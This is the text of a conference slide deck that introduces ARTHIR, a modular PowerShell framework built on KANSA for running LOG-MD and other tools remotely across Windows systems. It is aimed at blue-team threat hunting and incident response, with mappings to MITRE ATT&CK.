2. Whoami
• Blue Team Defender Ninjas, Incident Responder, Threat Hunter,
Logaholic
• Michael – Creator of all those Windows Logging Cheat Sheets and
the Malware Management Framework
• Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool
• BDIR Podcast - “Brakeing Down Incident Response”
• Special SHOUT OUT to
– Olaf Hartong @OlafHartong
– Josh Rickard @MSAdministrator
LOG-MD.com
4. So what’s the problem?
• There is an event
• We would like to investigate it
• We walk in with our laptops
– Or you use one of your systems
• What tools can you or we use to look across
all your Windows systems?
• Without installing anything!!!!
• Using what is already on all Windows systems
LOG-MD.com
5. What are our options?
• Use what we already have like SCCM, BigFix, etc.
• Install a tool with an agent, deal with more agent bloat and
agent interaction
• Remote into the system
• Do a forensics acquisition
• Use what is already on the system, living-off-the-land
• What we need is already found on all Windows systems!
• How can we share what we do with enterprise solutions?
• Use something the community can contribute to
LOG-MD.com
6. The Challenge
• Whether you are a Blue Teamer investigating
your own environment
• Or a consultant investigating a client
• We need a way to execute a wide range of
tools, utilities and scripts remotely to 1, 100 or
1000 systems
• It needs to be flexible enough to allow us to
run, respond, and hunt for many things
LOG-MD.com
7. Requirements
• Fits on a thumb drive
• Can run scripts
• Can run tools (no GUI)
• Can run utilities (no GUI)
• Can run larger jobs (Hash/Registry snapshots)
• Schedule Jobs that can run things on a regular
basis
LOG-MD.com
8. Requirements
• Walk in with a laptop
• Or use one of your systems
• Domain attached and domain creds
• No requirement to install anything
• Well… we want you to upgrade to PowerShell v5
• PS v5 is the only way to get good PowerShell
logging
– You didn’t think I wasn’t going to mention the
Malware Archaeology Cheat Sheets did you?
LOG-MD.com
9. What do you have and use?
• What tools do you use for Threat Hunting and
Incident Response?
• A bunch of utilities, tools, scripts?
• An EDR/EPP solution?
• Open Source tools and projects?
• Do you have anything?
• More importantly do you have budget?
LOG-MD.com
10. My Top 10 List of tools
1. Log Management
– Centralize data collection
– Query all the data
2. BigFix or equivalent
– Query anything you want on a system
– Run scripts, utilities, tools, etc.
– Run remediation jobs
3. LOG-MD
– Log Harvesting
– Hunting
– AutoRuns
– PowerShell
– SRUM
– Much more
LOG-MD.com
12. The problem I wanted to solve
• I want to query all the things #2
• I want to run scripts, utilities, tools #2
• I want to have the option to centralize the
data #1
• I want to query that data #1
• I don’t want to, or can’t install anything
• Of course I want to run my favorite utility/tool
– LOG-MD-Professional
LOG-MD.com
13. The problem I wanted to solve
• I am one of the creators of LOG-MD
• It is a great utility/tool
• It does a LOT of what I need to investigate a system
• I just needed a way to run it remotely on 1, 100 or
1000 systems to do Threat Hunting and/or Incident
Response
• And pull back the reports and organize them
• Maybe even collect them into a Log Management
solution #1
• Without a enterprise solution like BigFix #2
LOG-MD.com
15. 3 years ago…
• We announced LOG-MD at
this very conference
• Today we would like to
announce the release of…
•
ATT&CK Remote Threat Hunting Incident Response
ARTHIR.com
16. PowerShell?
• PowerShell is on every Windows system
• Can we use that?
• But can we run our own special binaries?
• We love our own tools
• Create scripts
• Something modular
• Allows for community support
ARTHIR.com
17. • A modular framework
• Leverages an existing project that we modified
to do what we wanted and needed
• KANSA was good, but lacked some capabilities
• I needed to run all features of LOG-MD and
pull the reports back
• KANSA did not work well at all for LOG-MD
• And run other utilities, say Sysinternals
ARTHIR.com
18. • So KANSA did some kewl stuff, just not enough
• So we modified it
• We had a couple issues
• Olaf Hartong helped us with report retrieval
• Josh Rickard helped us with scheduled tasks
• Once these changes were added suddenly we
had something that gave me a LOT of what
BigFix could do
ARTHIR.com
20. What does ATT&CK have to do with it?
• We LOVE MITRE ATT&CK
• It is a GREAT place to map your hunts to
• Or what to detect and hunt for
• It’s what your adversaries ACTUALLY do in
their attacks
• If you can detect and/or hunt for the
techniques in MITRE ATT&CK… you are WAY
ahead of most
ARTHIR.com
21. MITRE ATT&CKTM
• The A in ARTHIR stands for ATT&CKTM
• The idea here is to encourage you and anyone
making modules to map their efforts to MITRE
ATT&CK
• Help us Help the rest of us
• Take this information and any other detection
and hunting you can do and add it to YOUR
own ATT&CK Matrix
ARTHIR.com
22. Add your ATT&CK Mappings
• Check MITRE ATT&CK Tactics and Techniques
and add them to the ARTHIR module
• Map them to an overall matrix
ARTHIR.com
23. Cheat Sheets
• We released two ATT&CK cheat sheets as a
part of my SANS THIR talk in NOLA last year
• The goal was to see how good, or bad really
good logging would be for detecting or
hunting the techniques in ATT&CK
• It was shocking how much coverage there was
• Over 80%
ARTHIR.com
25. Remote
• The R in ARTHIR stands for Remote
• We need to be able to hunt and respond
remotely
• Execute what we want on 1, 10, 100, or 1000
systems
• And not 1 by 1 like you would have to with RDP
or some EDRs
• Bring back results to a central system
• Like BigFix can do
ARTHIR.com
26. Threat Hunting
• The TH in ARTHIR stands for Threat Hunting
• We need to be able to hunt for artifacts from
the techniques the adversaries use
• Run additional tools and utilities to hunt
• Centrally send results to say… log
management
ARTHIR.com
27. Incident Response
• The IR in ARTHIR stands for Incident Response
• We need to be able to respond to an attack
• Do additional investigation from an alert
• Run additional tools and utilities
• Centrally send results to say… log
management
ARTHIR.com
28. Modular
• We used the KANSA framework
• Even ported a few of the KANSA modules
• This framework design worked for us, no
reason to totally reinvent the wheel
• Create a module, add it to modules.conf
• Run the execution parameters
• Retrieve the reports
ARTHIR.com
29. RECON
• We provided some PowerShell scripts to get
system names from Active Directory
• You need to build a list of systems
• And we provided a Ping script so you can test
those system names are alive
• Add these to Hosts.txt to run your modules
against
ARTHIR.com
30. Available modules
• Several more popular KANSA modules have
been converted
• More will we done as we move forward and
need them
• We provided templates so YOU can do it too
• Remember that ‘community can contribute’
statement from earlier?
ARTHIR.com
39. You will make PowerShell noise
• Since ARTHIR uses PowerShell…
• The adversaries uses PowerShell
• You will add events to the PowerShell logs
• So test and whitelist the scriptblocks that
ARTHIR creates
• Make it easier to hunt the bad
• LOG-MD provides a Whitelist_PowerShell.txt
with many exclusions
ARTHIR.com
45. Recommend Sites
OSSEM - Open Source Security Events Metadata
• https://github.com/Cyb3rWard0g/OSSEM
SOCPrime SIGMA to SIEM convertor
• https://uncoder.io/
SIGMA - Generic Signature Format for SIEM Systems
• https://github.com/Neo23x0/sigma
Red Canary Atomic Red Team
• https://atomicredteam.io/
MATE - MITRE ATT&CK® Technique Emulation
• https://github.com/fugawi/mate
Atomic Threat Coverage
• https://github.com/krakow2600/atomic-threat-coverage
LOG-MD.com
46. Recommend Sites
The ThreatHunter-Playbook
• https://github.com/Cyb3rWard0g/ThreatHunter-
Playbook
OLAF Hartong
ThreatHunting | A Splunk app mapped to MITRE
ATT&CK to guide your threat hunts
• https://github.com/olafhartong/ThreatHunting
Sysmon-modular | A Sysmon configuration
repository for everybody to customize
• https://github.com/olafhartong/sysmon-modular
LOG-MD.com
48. Questions
• You can find us on the Twitters
– @HackerHurricane
• LOG-MD.com
• MalwareArchaeology.com
• Preso will be on SlideShare and linked on
MalwareArchaeology.com
• Listen to the PodCast to hear the rest of this topic
– http://www.brakeingdownir.libsyn.com/
LOG-MD.com